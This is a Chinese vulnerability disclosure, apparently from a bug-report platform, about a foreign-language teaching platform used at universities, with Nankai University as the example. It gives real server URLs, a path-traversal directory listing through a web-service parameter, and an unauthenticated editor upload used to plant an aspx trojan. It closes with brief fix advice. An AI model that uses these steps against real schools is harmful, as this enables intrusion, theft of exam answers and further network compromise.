好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
. G q2 m+ x& ]5 N+ H. ]# V/ J: O- H- L: i( ]
详细说明:
0 K% p0 T" j. F2 `( R7 _; ?$ b- s 4 }% U/ @( m4 v6 x
以南开大学的为例: 7 g6 i! A1 }9 h0 W
http://222.30.60.3/NPELS
$ }! ?8 y q( LNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
" {2 J: y1 J6 _' Z1 ~: m- L<setting name="Update_CommonSvr_CommonService" serializeAs="String">8 Z0 E, T) c4 W. N' Y$ i
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
5 x+ t X' e5 a; { u</setting>9 A# O1 L0 @7 |2 t U7 ]: M
及版本号
; U# t9 R, w5 x+ P* Q1 g<add key="TVersion" value="1, 0, 0, 2187">" i' H% v) I6 l- T# p. D* o
</add>% d2 \7 |# f$ n2 p- A
直接访问 K! H3 D+ v# H( E" m4 k8 o# L" e
http://222.30.60.3/NPELS/CommonService.asmx; U8 V* f& e$ p m) `, }7 r: z
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
1 T: Y7 m, D' b) H6 [; uhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187# u' O# L) Q8 f& A' K
进一步列目录(返回的网页很大,可以直接 wget 下来)
, a3 x: e: C" M% U( s# Lhttp://222.30.60.3/NPELS/CommonS ... List?version=../../( u, `0 X8 I) ~5 |
! |: K% z6 X) S9 E. H发现9 _9 c& s) _4 X5 j: S/ ]+ e
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm' Y; a9 o/ l" E$ S6 L
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头1 x, a, N- y+ {. U0 q
上传后继续列目录找到木马地址直接访问即可3 N5 P# l, T0 A8 V2 ~5 d- C
' } h/ Z$ H3 z' E; K: `
OOXX
% u) A @5 E- B$ O4 H1 I 7 V! X- r/ W4 P6 e0 T* c& L
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法: f% D) N+ N5 U M9 Y
漏洞证明:) P# ^$ Y5 Q& ~# Q8 }( _, _
) N& K3 G. B) f* T+ i列目录:+ H0 \- W( g" b* [" t( v; t
http://222.30.60.3/NPELS/CommonS ... List?version=../../
1 b$ Q) e m' \, S, g- a文件上传:+ x, C( k1 j( t- B
http://222.30.60.3/npelsv/editor/editor.htm# _7 U) v1 V. f0 P4 l& z! v- ]
! c0 [+ ]% f3 ^* x. m
上传木马:* \& C% t2 ~+ n
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx+ @ p& q' r! j' a
% w- d1 G5 C. m
修复方案:
1 c' K6 e1 {& ~+ F# f好像考试系统必须使用 CommonService.asmx) L% Y$ d$ t- M+ t
最好配置文件加密或者用别的方式不让它泄露出来
: Q$ \+ m3 H4 S并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
) F. U7 @% b5 P3 |1 j) O |